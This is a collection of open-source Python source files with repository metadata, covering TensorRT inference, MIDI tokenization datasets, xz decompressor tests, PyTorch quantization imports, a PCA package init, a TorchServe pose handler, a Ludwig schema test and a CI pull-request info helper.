for binding in engine:
if engine.get_tensor_mode(binding) == trt.TensorIOMode.INPUT:
input_binding = binding
else:
output_binding = binding
assert input_binding
assert output_binding
self.input_shape = [max_batch_size, *engine.get_tensor_shape(input_binding)[1:]]
self.input_dtype = trt.nptype(engine.get_tensor_dtype(input_binding))
size = trt.volume(engine.get_tensor_shape(input_binding)) * max_batch_size
self.host_input = cuda.pagelocked_empty(shape=[size], dtype=self.input_dtype)
self.cuda_input = cuda.mem_alloc(self.host_input.nbytes)
self.input_binding, self.output_binding = input_binding, output_binding
self.output_shape = [max_batch_size, *engine.get_tensor_shape(output_binding)[1:]]
self.output_dtype = trt.nptype(engine.get_tensor_dtype(output_binding))
size = trt.volume(engine.get_tensor_shape(output_binding)) * max_batch_size
self.host_output = cuda.pagelocked_empty(shape=[size], dtype=self.output_dtype)
self.cuda_output = cuda.mem_alloc(self.host_output.nbytes)
self.output_dim = self.output_shape[1:]
self.output_ravel_dim = self.host_output.shape[0] // max_batch_size
self.allocations = [int(self.cuda_input), int(self.cuda_output)]
self.max_batch_size = max_batch_size
self.engine = engine
self.stream = cuda.Stream()
self.context = engine.create_execution_context()
def __call__(self, imgs):
batch_size = imgs.shape[0]
if batch_size > self.max_batch_size:
print(f"Warning: provided input with batch_size={batch_size} exceeds max_batch_size={self.max_batch_size}")
batch_size = self.max_batch_size
imgs = imgs[: self.max_batch_size]
inputs = imgs.ravel()
# self.context.set_binding_shape(0, imgs.shape)
np.copyto(self.host_input[: inputs.shape[0]], inputs)
cuda.memcpy_htod_async(self.cuda_input, self.host_input[: inputs.shape[0]], self.stream)
# Run inference asynchronously, same function in cpp is `IExecutionContext::enqueueV2`
self.context.execute_async_v2(bindings=self.allocations, stream_handle=self.stream.handle)
# Transfer predictions back from the GPU.
cuda.memcpy_dtoh_async(self.host_output[: batch_size * self.output_ravel_dim], self.cuda_output, self.stream)
# Synchronize the stream
self.stream.synchronize()
return self.host_output[: batch_size * self.output_ravel_dim].reshape([batch_size, *self.output_dim]).copy()
if __name__ == "__main__":
# !pip install kecam torch torchvision onnx pycuda tensorrt
# !git clone https://github.com/NVIDIA/TensorRT.git
# cd TensorRT/samples/trtexec
import torch
import torchvision
from kecam.imagenet.tensorrt_engine import ImageCalibrator, build_onnx_engine_one_input, EngineInferenceOneInOneOut
mm = torchvision.models.resnet50(pretrained=True)
torch.onnx.export(mm, torch.ones([1, 3, 224, 224]), "aaa.onnx")
aa = ImageCalibrator("calibration_imagenet/", "foo.cache")
ee = build_onnx_engine_one_input("aaa.onnx", int8_calibrator=aa)
cc = EngineInferenceOneInOneOut(ee)
print(cc(np.ones([1, 3, 224, 224])).shape)
|
ed6f6ee9a03080ce61e797008032803656293972
|
269ffc022565c7982017a866ec0e515c90b48940
|
/miditok/pytorch_data/datasets.py
|
08a4131c5a2a39aede10c11c66bf67ddafea4e88
|
[
"MIT"
] |
permissive
|
Natooz/MidiTok
|
36efda7fef567f4f2fc81053609568e0c6cbc678
|
a1543cd0e0a9a3ee1de6fb77abcdfcffc274b9f1
|
refs/heads/main
| 2023-09-01T14:11:00.854742
| 2023-08-31T13:44:40
| 2023-08-31T13:44:40
| 394,933,651
| 410
| 54
|
MIT
| 2023-09-07T08:18:00
| 2021-08-11T09:24:38
|
Python
|
UTF-8
|
Python
| false
| false
| 9,926
|
py
|
datasets.py
|
"""
PyTorch `Dataset` objects, to be used with PyTorch `DataLoaders` to load and send data during training.
"""
from pathlib import Path
from typing import List, Union, Sequence, Any, Mapping
from abc import ABC
from copy import deepcopy
import json
from torch import LongTensor, randint
from torch.utils.data import Dataset
from miditok import MIDITokenizer
from miditoolkit import MidiFile
from tqdm import tqdm
from ..constants import MIDI_FILES_EXTENSIONS
def split_seq_in_subsequences(
seq: Sequence[any], min_seq_len: int, max_seq_len: int
) -> List[Sequence[Any]]:
r"""Split a sequence of tokens into subsequences for which `min_seq_len <= len(sub_seq) <= max_seq_len`.
:param seq: sequence to split.
:param min_seq_len: minimum sequence length.
:param max_seq_len: maximum sequence length.
:return: list of subsequences.
"""
sub_seq = []
i = 0
while i < len(seq):
if i >= len(seq) - min_seq_len:
break # last sample is too short
sub_seq.append(LongTensor(seq[i : i + max_seq_len]))
i += len(sub_seq[-1]) # could be replaced with max_seq_len
return sub_seq
def split_dataset_to_subsequences(
files_paths: Sequence[Union[Path, str]],
out_dir: Union[Path, str],
min_seq_len: int,
max_seq_len: int,
one_token_stream: bool = True,
):
"""
:param files_paths: list of files of tokens to split.
:param out_dir: output directory to save the subsequences.
:param min_seq_len: minimum sequence length.
:param max_seq_len: maximum sequence length.
:param one_token_stream: give False if the token files contains multiple tracks, i.e. the first dimension of
the value of the "ids" entry corresponds to several tracks. Otherwise, leave False. (default: True)
"""
out_dir = Path(out_dir)
out_dir.mkdir(parents=True, exist_ok=True)
for file_path in files_paths:
with open(file_path) as json_file:
tokens = json.load(json_file)
# Split sequence(s)
if one_token_stream:
subseqs = split_seq_in_subsequences(tokens["ids"], min_seq_len, max_seq_len)
else:
subseqs = []
for track_seq in tokens["ids"]:
subseqs += split_seq_in_subsequences(
track_seq, min_seq_len, max_seq_len
)
# Save subsequences
for i, subseq in enumerate(subseqs):
path = out_dir / f"{file_path.name}_{i}.json"
with open(path, "w") as outfile:
new_tok = deepcopy(tokens)
new_tok["ids"] = subseq
json.dump(tokens, outfile)
class _DatasetABC(Dataset, ABC):
r"""Abstract Dataset class, holding samples (and optionally labels) and implementing the basic magic methods.
:param samples: sequence of input samples. It can directly be data, or a paths to files to be loaded.
:param labels: sequence of labels associated with the samples. (default: None)
:param sample_key_name: name of the dictionary key containing the sample data when iterating the dataset.
(default: "input_ids")
:param labels_key_name: name of the dictionary key containing the labels data when iterating the dataset.
(default: "labels")
"""
def __init__(
self,
samples: Sequence[Any] = None,
labels: Sequence[Any] = None,
sample_key_name: str = "input_ids",
labels_key_name: str = "labels",
):
if samples is not None and labels is not None:
assert len(samples) == len(
labels
), "The number of samples must be the same as the number of labels"
self.samples = samples if samples is not None else []
self.labels = labels
self.sample_key_name = sample_key_name
self.labels_key_name = labels_key_name
def reduce_nb_samples(self, nb_samples: int):
r"""Reduce the size of the dataset, by keeping `nb_samples` samples.
:param nb_samples: number of samples to keep. They will be randomly picked.
"""
idx = randint(0, len(self), (nb_samples,))
self.samples = [self.samples[id_] for id_ in idx.tolist()]
if self.labels is not None:
self.labels = [self.labels[id_] for id_ in idx.tolist()]
def __len__(self) -> int:
return len(self.samples)
def __getitem__(self, idx) -> Mapping[str, Any]:
item = {self.sample_key_name: self.samples[idx]}
if self.labels is not None:
item[self.labels_key_name] = self.labels[idx]
return item
def __repr__(self):
return self.__str__()
def __str__(self) -> str:
return "No data loaded" if len(self) == 0 else f"{len(self.samples)} samples"
class DatasetTok(_DatasetABC):
r"""Basic `Dataset` loading Json files of tokenized MIDIs, or MIDI files to tokenize, and
store the token ids in RAM. It outputs token sequences that can be used to train generative models.
The tokens sequences being loaded will then be split into subsequences, of length
comprise between `min_seq_len` and `max_seq_len`.
For example, with `min_seq_len = 50` and `max_seq_len = 100`:
* a sequence of 650 tokens will be split into 6 subsequences of 100 tokens plus one subsequence of 50 tokens;
* a sequence of 620 tokens will be split into 6 subsequences of 100 tokens, the last 20 tokens will be discarded;
* a sequence of 670 tokens will be split into 6 subsequences of 100 tokens plus one subsequence of 50 tokens,
and the last 20 tokens will be discarded.
This `Dataset` class is well suited if you have enough RAM to store all the data, as it does not require you to
prior split the dataset into subsequences of the length you desire.
Note that if you directly load MIDI files, the loading can take some time as they will need to be tokenized.
You might want to tokenize them before once with the `tokenizer.tokenize_midi_dataset()` method.
:param files_paths: list of paths to files to load.
:param min_seq_len: minimum sequence length (in nb of tokens)
:param max_seq_len: maximum sequence length (in nb of tokens)
:param tokenizer: tokenizer object, to use to load MIDIs instead of tokens. (default: None)
:param one_token_stream: give False if the token files contains multiple tracks, i.e. the first dimension of
the value of the "ids" entry corresponds to several tracks. Otherwise, leave False. (default: True)
:param sample_key_name: name of the dictionary key containing the sample data when iterating the dataset.
(default: "input_ids")
"""
def __init__(
self,
files_paths: Sequence[Path],
min_seq_len: int,
max_seq_len: int,
tokenizer: MIDITokenizer = None,
one_token_stream: bool = True,
sample_key_name: str = "input_ids",
):
samples = []
if tokenizer is not None:
one_token_stream = tokenizer.one_token_stream
for file_path in tqdm(
files_paths,
desc=f"Loading data: {files_paths[0].parent}",
miniters=int(len(files_paths) / 20),
maxinterval=480,
):
if file_path.suffix in MIDI_FILES_EXTENSIONS:
midi = MidiFile(file_path)
for _ in range(len(midi.instruments) - 1):
del midi.instruments[1] # removes all tracks except first one
tokens = tokenizer.midi_to_tokens(midi)
if one_token_stream:
tokens = tokens.ids
else:
tokens = [seq.ids for seq in tokens]
else:
with open(file_path) as json_file:
tokens = json.load(json_file)["ids"]
if one_token_stream:
tokens = [tokens]
# Cut tokens in samples of appropriate length
for seq in tokens:
subseqs = split_seq_in_subsequences(seq, min_seq_len, max_seq_len)
samples += subseqs
super().__init__(samples, sample_key_name=sample_key_name)
class DatasetJsonIO(_DatasetABC):
r"""Basic `Dataset` loading Json files of tokenized MIDIs on the fly.
When executing `dataset[idx]`, this class will load the `files_paths[idx]` json file and return the token ids,
that can be used to train generative models.
**This class is only compatible with tokens saved as a single stream of tokens
(** `tokenizer.one_token_stream` **).** If you plan to use it with token files containing multiple token streams,
you should first it with `miditok.pytorch_data.split_dataset_to_subsequences()`.
It allows to reduce the sequence length up to a `max_seq_len` limit, but will not split the sequences into
subsequences. If your dataset contains sequences with lengths largely varying, you might want to first split it
into subsequences with the `miditok.pytorch_data.split_dataset_to_subsequences()` method before loading it to avoid
losing data.
This `Dataset` class is well suited if you are using a large dataset, or have access to limited RAM resources.
:param files_paths: list of paths to files to load.
:param max_seq_len: maximum sequence length (in nb of tokens). (default: None)
"""
def __init__(
self,
files_paths: Sequence[Path],
max_seq_len: int = None,
):
self.max_seq_len = max_seq_len
super().__init__(files_paths)
def __getitem__(self, idx) -> Mapping[str, LongTensor]:
with open(self.samples[idx]) as json_file:
token_ids = json.load(json_file)["ids"]
if self.max_seq_len is not None and len(token_ids) > self.max_seq_len:
token_ids = token_ids[: self.max_seq_len]
item = {"input_ids": LongTensor(token_ids)}
return item
|
4100d5c2ad0f2307a58faa7d5fdf368d47595078
|
29dfa1deefc72493d1b1eecf1a8df62e24599a77
|
/tests/compression/xz_decompressor.py
|
92a0b901597c4e3ccb07773a4da2cbd45d093740
|
[
"Apache-2.0"
] |
permissive
|
log2timeline/dfvfs
|
fd301eaf721a9945641a44ff722aec963158a6b3
|
28756d910e951a22c5f0b2bcf5184f055a19d544
|
refs/heads/main
| 2023-08-07T22:45:45.432668
| 2023-07-30T12:17:56
| 2023-07-30T12:17:56
| 23,820,144
| 197
| 65
|
Apache-2.0
| 2023-07-30T12:17:58
| 2014-09-09T05:06:44
|
Python
|
UTF-8
|
Python
| false
| false
| 2,425
|
py
|
xz_decompressor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for the xz decompressor object."""
import unittest
try:
from dfvfs.compression import xz_decompressor
except ImportError:
xz_decompressor = None
from dfvfs.lib import errors
from tests.compression import test_lib
@unittest.skipIf(xz_decompressor is None, 'requires LZMA compression support')
class LZMADecompressorTestCase(test_lib.DecompressorTestCase):
"""Tests for the lzma decompressor object."""
def testDecompress(self):
"""Tests the Decompress method."""
decompressor = xz_decompressor.LZMADecompressor()
compressed_data = (
b']\x00\x00\x80\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00*\x1a\t\'d\x1c'
b'\x87\x8aO\xcaL\xf4\xf8!\xda\x88\xd8\xff\xff\xeb\xcc\x00')
uncompressed_data, _ = decompressor.Decompress(compressed_data)
expected_uncompressed_data = b'This is a test.'
self.assertEqual(uncompressed_data, expected_uncompressed_data)
# Test to trigger lzma raising EOFError.
with self.assertRaises(errors.BackEndError):
decompressor.Decompress(b'This is a test.')
# Test to trigger lzma raising IOError.
decompressor = xz_decompressor.LZMADecompressor()
with self.assertRaises(errors.BackEndError):
decompressor.Decompress(b'This is a test.')
@unittest.skipIf(xz_decompressor is None, 'requires LZMA compression support')
class XZDecompressorTestCase(test_lib.DecompressorTestCase):
"""Tests for the xz decompressor object."""
def testDecompress(self):
"""Tests the Decompress method."""
decompressor = xz_decompressor.XZDecompressor()
compressed_data = (
b'\xfd7zXZ\x00\x00\x01i"\xde6\x02\xc0\x13\x0f!\x01\x16\x00\xc0\xb7\xdc'
b'\xe9\x01\x00\x0eThis is a test.\x00\x00]\xc9\xc3\xc6\x00\x01#\x0f\xdb'
b'\xdf\x90\x0e\x90B\x99\r\x01\x00\x00\x00\x00\x01YZ')
uncompressed_data, _ = decompressor.Decompress(compressed_data)
expected_uncompressed_data = b'This is a test.'
self.assertEqual(uncompressed_data, expected_uncompressed_data)
# Test to trigger xz raising EOFError.
with self.assertRaises(errors.BackEndError):
decompressor.Decompress(b'This is a test.')
# Test to trigger xz raising IOError.
decompressor = xz_decompressor.XZDecompressor()
with self.assertRaises(errors.BackEndError):
decompressor.Decompress(b'This is a test.')
if __name__ == '__main__':
unittest.main()
|
f5a07fe1929cd9e6e654afa908bed8537bb90699
|
afd2087e80478010d9df66e78280f75e1ff17d45
|
/torch/quantization/qconfig.py
|
6bb7e14110cb9cdc4e9c2c418c6776ea6445f0d3
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] |
permissive
|
pytorch/pytorch
|
7521ac50c47d18b916ae47a6592c4646c2cb69b5
|
a6f7dd4707ac116c0f5fb5f44f42429f38d23ab4
|
refs/heads/main
| 2023-08-03T05:05:02.822937
| 2023-08-03T00:40:33
| 2023-08-03T04:14:52
| 65,600,975
| 77,092
| 24,610
|
NOASSERTION
| 2023-09-14T21:58:39
| 2016-08-13T05:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 910
|
py
|
qconfig.py
|
# flake8: noqa: F401
r"""
This file is in the process of migration to `torch/ao/quantization`, and
is kept here for compatibility while the migration process is ongoing.
If you are adding a new entry/functionality, please, add it to the
`torch/ao/quantization/qconfig.py`, while adding an import statement
here.
"""
from torch.ao.quantization.qconfig import (
_add_module_to_qconfig_obs_ctr,
_assert_valid_qconfig,
default_activation_only_qconfig,
default_debug_qconfig,
default_dynamic_qconfig,
default_per_channel_qconfig,
default_qat_qconfig,
default_qat_qconfig_v2,
default_qconfig,
default_weight_only_qconfig,
float16_dynamic_qconfig,
float16_static_qconfig,
float_qparams_weight_only_qconfig,
get_default_qat_qconfig,
get_default_qconfig,
per_channel_dynamic_qconfig,
QConfig,
qconfig_equals,
QConfigAny,
QConfigDynamic,
)
|
5d60e5123a6e23163ee49d674cf2506d5cbc0e65
|
ebb3188aa1b3846d13eafbad4714326a1f6ece64
|
/pca/__init__.py
|
7d93884c227411f751fdea58ea88b8290db1e8c4
|
[
"MIT"
] |
permissive
|
erdogant/pca
|
14793e78c02069e6983d718ecadee76eeef4253e
|
9c42b0967d81c5dc985837be2f5d1dcb729b4702
|
refs/heads/master
| 2023-08-17T18:54:40.445251
| 2023-08-05T18:43:02
| 2023-08-05T18:43:02
| 233,232,884
| 247
| 45
|
MIT
| 2022-02-22T19:33:08
| 2020-01-11T13:04:39
|
Python
|
UTF-8
|
Python
| false
| false
| 1,191
|
py
|
__init__.py
|
from pca.pca import pca
from pca.pca import (
import_example,
hotellingsT2,
spe_dmodx,
)
__author__ = 'Erdogan Tasksen'
__email__ = 'erdogant@gmail.com'
__version__ = '2.0.4'
# module level doc-string
__doc__ = """
pca
=====================================================================
pca: A Python Package for Principal Component Analysis.
Examples
--------
>>> from pca import pca
>>>
>>> Initialize
>>> model = pca(n_components=3)
>>>
>>> # Load example data
>>> df = model.import_example(data='iris')
>>>
>>> # Fit using PCA
>>> results = model.fit_transform(df)
>>>
>>> # Scree plot together with explained variance.
>>> fig, ax = model.plot()
>>>
>>> # Plot loadings
>>> fig, ax = model.biplot()
>>> fig, ax = model.biplot(density=True, SPE=True, HT2=True)
>>> fig, ax = model.scatter()
>>>
>>> 3D plots
>>> fig, ax = model.scatter3d()
>>> fig, ax = model.biplot3d(density=True, SPE=True, HT2=True)
>>>
>>> # Normalize out PCs
>>> X_norm = model.norm(X)
References
----------
* Blog: https://towardsdatascience.com/what-are-pca-loadings-and-biplots-9a7897f2e559
* Github: https://github.com/erdogant/pca
* Documentation: https://erdogant.github.io/pca/
"""
|
55980fa13232ffbfb616b2d647fe1a093b064862
|
0db19410e9751790af8ce4a0a9332293e379c02f
|
/tools/torchserve/mmpose_handler.py
|
d7da881cdc9dd26ab23242052668958b8172ce57
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmpose
|
2c9986521d35eee35d822fb255e8e68486026d94
|
537bd8e543ab463fb55120d5caaa1ae22d6aaf06
|
refs/heads/main
| 2023-08-30T19:44:21.349410
| 2023-07-04T13:18:22
| 2023-07-04T13:18:22
| 278,003,645
| 4,037
| 1,171
|
Apache-2.0
| 2023-09-14T09:44:55
| 2020-07-08T06:02:55
|
Python
|
UTF-8
|
Python
| false
| false
| 2,709
|
py
|
mmpose_handler.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import base64
import os
import mmcv
import torch
from mmpose.apis import (inference_bottom_up_pose_model,
inference_top_down_pose_model, init_pose_model)
from mmpose.models.detectors import AssociativeEmbedding, TopDown
try:
from ts.torch_handler.base_handler import BaseHandler
except ImportError:
raise ImportError('Please install torchserve.')
class MMPoseHandler(BaseHandler):
def initialize(self, context):
properties = context.system_properties
self.map_location = 'cuda' if torch.cuda.is_available() else 'cpu'
self.device = torch.device(self.map_location + ':' +
str(properties.get('gpu_id')) if torch.cuda.
is_available() else self.map_location)
self.manifest = context.manifest
model_dir = properties.get('model_dir')
serialized_file = self.manifest['model']['serializedFile']
checkpoint = os.path.join(model_dir, serialized_file)
self.config_file = os.path.join(model_dir, 'config.py')
self.model = init_pose_model(self.config_file, checkpoint, self.device)
self.initialized = True
def preprocess(self, data):
images = []
for row in data:
image = row.get('data') or row.get('body')
if isinstance(image, str):
image = base64.b64decode(image)
image = mmcv.imfrombytes(image)
images.append(image)
return images
def inference(self, data, *args, **kwargs):
if isinstance(self.model, TopDown):
results = self._inference_top_down_pose_model(data)
elif isinstance(self.model, (AssociativeEmbedding, )):
results = self._inference_bottom_up_pose_model(data)
else:
raise NotImplementedError(
f'Model type {type(self.model)} is not supported.')
return results
def _inference_top_down_pose_model(self, data):
results = []
for image in data:
# use dummy person bounding box
preds, _ = inference_top_down_pose_model(
self.model, image, person_results=None)
results.append(preds)
return results
def _inference_bottom_up_pose_model(self, data):
results = []
for image in data:
preds, _ = inference_bottom_up_pose_model(self.model, image)
results.append(preds)
return results
def postprocess(self, data):
output = [[{
'keypoints': pred['keypoints'].tolist()
} for pred in preds] for preds in data]
return output
|
eb554b4e467db180878da36610dc28539e1ec8dd
|
7eb606a7957e5500f163c93dc4b19418cf9cf335
|
/tests/ludwig/marshmallow/test_fields_preprocessing.py
|
a340e3ad561d1fdec7fecf05fbf6df2eab03c1af
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
ludwig-ai/ludwig
|
024f74da86567a57ec8e30efcb4600f0c52333a1
|
e1d023e41606c9b76b35e1d231c2f13368a30eca
|
refs/heads/master
| 2023-09-03T08:07:32.978301
| 2023-09-01T19:39:32
| 2023-09-01T19:39:32
| 163,346,054
| 2,567
| 285
|
Apache-2.0
| 2023-09-14T20:34:52
| 2018-12-27T23:58:12
|
Python
|
UTF-8
|
Python
| false
| false
| 1,127
|
py
|
test_fields_preprocessing.py
|
#! /usr/bin/env python
from ludwig.schema.features.preprocessing.binary import BinaryPreprocessingConfig
from ludwig.schema.features.preprocessing.category import CategoryPreprocessingConfig
from ludwig.schema.features.preprocessing.utils import PreprocessingDataclassField
def get_marshmallow_from_dataclass_field(dfield):
"""Helper method for checking marshmallow metadata succinctly."""
return dfield.metadata["marshmallow_field"]
def test_preprocessing_dataclass_field():
binary_preproc_dataclass = PreprocessingDataclassField("binary")
assert binary_preproc_dataclass.default_factory is not None
assert get_marshmallow_from_dataclass_field(binary_preproc_dataclass).allow_none is False
assert binary_preproc_dataclass.default_factory() == BinaryPreprocessingConfig()
category_preproc_dataclass = PreprocessingDataclassField("category")
assert category_preproc_dataclass.default_factory is not None
assert get_marshmallow_from_dataclass_field(category_preproc_dataclass).allow_none is False
assert category_preproc_dataclass.default_factory() == CategoryPreprocessingConfig()
|
b31c6e7b5791c64ff847aa5aa6dd85c3ef5a6bd4
|
fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
|
/olap/ByConity/tests/ci/pr_info.py
|
86b3081f98c075e4701b4e158b2458323782761e
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
alldatacenter/alldata
|
7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
|
8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
|
refs/heads/master
| 2023-08-05T07:32:25.442740
| 2023-08-03T13:17:24
| 2023-08-03T13:17:24
| 213,321,771
| 774
| 250
|
Apache-2.0
| 2023-09-06T17:35:32
| 2019-10-07T07:36:18
| null |
UTF-8
|
Python
| false
| false
| 12,503
|
py
|
pr_info.py
|
#!/usr/bin/env python3
import json
import logging
import os
from typing import Set
from unidiff import PatchSet # type: ignore
from build_download_helper import get_with_retries
from env_helper import (
GITHUB_REPOSITORY,
GITHUB_SERVER_URL,
GITHUB_RUN_URL,
GITHUB_EVENT_PATH,
)
FORCE_TESTS_LABEL = "force tests"
SKIP_SIMPLE_CHECK_LABEL = "skip simple check"
DIFF_IN_DOCUMENTATION_EXT = [
".html",
".md",
".yml",
".txt",
".css",
".js",
".xml",
".ico",
".conf",
".svg",
".png",
".jpg",
".py",
".sh",
".json",
]
RETRY_SLEEP = 0
def get_pr_for_commit(sha, ref):
if not ref:
return None
try_get_pr_url = (
f"https://api.github.com/repos/{GITHUB_REPOSITORY}/commits/{sha}/pulls"
)
try:
response = get_with_retries(try_get_pr_url, sleep=RETRY_SLEEP)
data = response.json()
if len(data) > 1:
print("Got more than one pr for commit", sha)
for pr in data:
# refs for pushes looks like refs/head/XX
# refs for RPs looks like XX
if pr["head"]["ref"] in ref:
return pr
print("Cannot find PR with required ref", ref, "returning first one")
first_pr = data[0]
return first_pr
except Exception as ex:
print("Cannot fetch PR info from commit", ex)
return None
class PRInfo:
default_event = {
"commits": 1,
"before": "HEAD~",
"after": "HEAD",
"ref": None,
}
def __init__(
self,
github_event=None,
need_orgs=False,
need_changed_files=False,
pr_event_from_api=False,
):
if not github_event:
if GITHUB_EVENT_PATH:
with open(GITHUB_EVENT_PATH, "r", encoding="utf-8") as event_file:
github_event = json.load(event_file)
else:
github_event = PRInfo.default_event.copy()
self.event = github_event
self.changed_files = set() # type: Set[str]
self.body = ""
self.diff_urls = []
self.release_pr = ""
ref = github_event.get("ref", "refs/head/master")
if ref and ref.startswith("refs/heads/"):
ref = ref[11:]
# workflow completed event, used for PRs only
if "action" in github_event and github_event["action"] == "completed":
self.sha = github_event["workflow_run"]["head_sha"]
prs_for_sha = get_with_retries(
f"https://api.github.com/repos/{GITHUB_REPOSITORY}/commits/{self.sha}"
"/pulls",
sleep=RETRY_SLEEP,
).json()
if len(prs_for_sha) != 0:
github_event["pull_request"] = prs_for_sha[0]
if "pull_request" in github_event: # pull request and other similar events
self.number = github_event["pull_request"]["number"]
if pr_event_from_api:
try:
response = get_with_retries(
f"https://api.github.com/repos/{GITHUB_REPOSITORY}"
f"/pulls/{self.number}",
sleep=RETRY_SLEEP,
)
github_event["pull_request"] = response.json()
except Exception as e:
logging.warning(
"Unable to get pull request event %s from API, "
"fallback to received event. Exception: %s",
self.number,
e,
)
if "after" in github_event:
self.sha = github_event["after"]
else:
self.sha = github_event["pull_request"]["head"]["sha"]
repo_prefix = f"{GITHUB_SERVER_URL}/{GITHUB_REPOSITORY}"
self.task_url = GITHUB_RUN_URL
self.repo_full_name = GITHUB_REPOSITORY
self.commit_html_url = f"{repo_prefix}/commits/{self.sha}"
self.pr_html_url = f"{repo_prefix}/pull/{self.number}"
self.base_ref = github_event["pull_request"]["base"]["ref"]
self.base_name = github_event["pull_request"]["base"]["repo"]["full_name"]
self.head_ref = github_event["pull_request"]["head"]["ref"]
self.head_name = github_event["pull_request"]["head"]["repo"]["full_name"]
self.body = github_event["pull_request"]["body"]
self.labels = {
label["name"] for label in github_event["pull_request"]["labels"]
}
self.user_login = github_event["pull_request"]["user"]["login"]
self.user_orgs = set([])
if need_orgs:
user_orgs_response = get_with_retries(
github_event["pull_request"]["user"]["organizations_url"],
sleep=RETRY_SLEEP,
)
if user_orgs_response.ok:
response_json = user_orgs_response.json()
self.user_orgs = set(org["id"] for org in response_json)
self.diff_urls.append(github_event["pull_request"]["diff_url"])
elif "commits" in github_event:
self.sha = github_event["after"]
pull_request = get_pr_for_commit(self.sha, github_event["ref"])
repo_prefix = f"{GITHUB_SERVER_URL}/{GITHUB_REPOSITORY}"
self.task_url = GITHUB_RUN_URL
self.commit_html_url = f"{repo_prefix}/commits/{self.sha}"
self.repo_full_name = GITHUB_REPOSITORY
if pull_request is None or pull_request["state"] == "closed":
# it's merged PR to master
self.number = 0
self.labels = {}
self.pr_html_url = f"{repo_prefix}/commits/{ref}"
self.base_ref = ref
self.base_name = self.repo_full_name
self.head_ref = ref
self.head_name = self.repo_full_name
self.diff_urls.append(
f"https://api.github.com/repos/{GITHUB_REPOSITORY}/"
f"compare/{github_event['before']}...{self.sha}"
)
else:
self.number = pull_request["number"]
self.labels = {label["name"] for label in pull_request["labels"]}
self.base_ref = pull_request["base"]["ref"]
self.base_name = pull_request["base"]["repo"]["full_name"]
self.head_ref = pull_request["head"]["ref"]
self.head_name = pull_request["head"]["repo"]["full_name"]
self.pr_html_url = pull_request["html_url"]
if "pr-backport" in self.labels:
# head1...head2 gives changes in head2 since merge base
# Thag's why we need {self.head_ref}...master to get
# files changed in upstream AND master...{self.head_ref}
# to get files, changed in current HEAD
self.diff_urls.append(
f"https://github.com/{GITHUB_REPOSITORY}/"
f"compare/master...{self.head_ref}.diff"
)
self.diff_urls.append(
f"https://github.com/{GITHUB_REPOSITORY}/"
f"compare/{self.head_ref}...master.diff"
)
# Get release PR number.
self.release_pr = get_pr_for_commit(self.base_ref, self.base_ref)[
"number"
]
else:
self.diff_urls.append(pull_request["diff_url"])
if "release" in self.labels:
# For release PRs we must get not only files changed in the PR
# itself, but as well files changed since we branched out
self.diff_urls.append(
f"https://github.com/{GITHUB_REPOSITORY}/"
f"compare/{self.head_ref}...master.diff"
)
else:
print("event.json does not match pull_request or push:")
print(json.dumps(github_event, sort_keys=True, indent=4))
self.sha = os.getenv("GITHUB_SHA")
self.number = 0
self.labels = {}
repo_prefix = f"{GITHUB_SERVER_URL}/{GITHUB_REPOSITORY}"
self.task_url = GITHUB_RUN_URL
self.commit_html_url = f"{repo_prefix}/commits/{self.sha}"
self.repo_full_name = GITHUB_REPOSITORY
self.pr_html_url = f"{repo_prefix}/commits/{ref}"
self.base_ref = ref
self.base_name = self.repo_full_name
self.head_ref = ref
self.head_name = self.repo_full_name
if need_changed_files:
self.fetch_changed_files()
def fetch_changed_files(self):
if not getattr(self, "diff_urls", False):
raise TypeError("The event does not have diff URLs")
for diff_url in self.diff_urls:
response = get_with_retries(
diff_url,
sleep=RETRY_SLEEP,
)
response.raise_for_status()
if "commits" in self.event and self.number == 0:
diff = response.json()
if "files" in diff:
self.changed_files = {f["filename"] for f in diff["files"]}
else:
diff_object = PatchSet(response.text)
self.changed_files.update({f.path for f in diff_object})
print(f"Fetched info about {len(self.changed_files)} changed files")
def get_dict(self):
return {
"sha": self.sha,
"number": self.number,
"labels": self.labels,
"user_login": self.user_login,
"user_orgs": self.user_orgs,
}
def has_changes_in_documentation(self):
# If the list wasn't built yet the best we can do is to
# assume that there were changes.
if self.changed_files is None or not self.changed_files:
return True
for f in self.changed_files:
_, ext = os.path.splitext(f)
path_in_docs = "docs" in f
path_in_website = "website" in f
if (
ext in DIFF_IN_DOCUMENTATION_EXT and (path_in_docs or path_in_website)
) or "docker/docs" in f:
return True
return False
def has_changes_in_submodules(self):
if self.changed_files is None or not self.changed_files:
return True
for f in self.changed_files:
if "contrib/" in f:
return True
return False
def can_skip_builds_and_use_version_from_master(self):
# TODO: See a broken loop
if FORCE_TESTS_LABEL in self.labels:
return False
if self.changed_files is None or not self.changed_files:
return False
for f in self.changed_files:
# TODO: this logic is broken, should be fixed before using
if (
not f.startswith("tests/queries")
or not f.startswith("tests/integration")
or not f.startswith("tests/performance")
):
return False
return True
def can_skip_integration_tests(self):
# TODO: See a broken loop
if FORCE_TESTS_LABEL in self.labels:
return False
if self.changed_files is None or not self.changed_files:
return False
for f in self.changed_files:
# TODO: this logic is broken, should be fixed before using
if not f.startswith("tests/queries") or not f.startswith(
"tests/performance"
):
return False
return True
def can_skip_functional_tests(self):
# TODO: See a broken loop
if FORCE_TESTS_LABEL in self.labels:
return False
if self.changed_files is None or not self.changed_files:
return False
for f in self.changed_files:
# TODO: this logic is broken, should be fixed before using
if not f.startswith("tests/integration") or not f.startswith(
"tests/performance"
):
return False
return True
class FakePRInfo:
def __init__(self):
self.number = 11111
self.sha = "xxxxxxxxxxxxxxxxxx"
|
2db1c353b764feeba9c3cd045192fcc9bed8875b
|
d854a0e93db79fad31dcc6fe61bfd26f3a5b9990
|
/algs4/depth_first_order.py
|
06cc5609d676ad6673322765b7245a61c2c541d1
|
[
"MIT"
] |
permissive
|
shellfly/algs4-py
|
334a8b7bd040db03859076e18a8aba98bfabc501
|
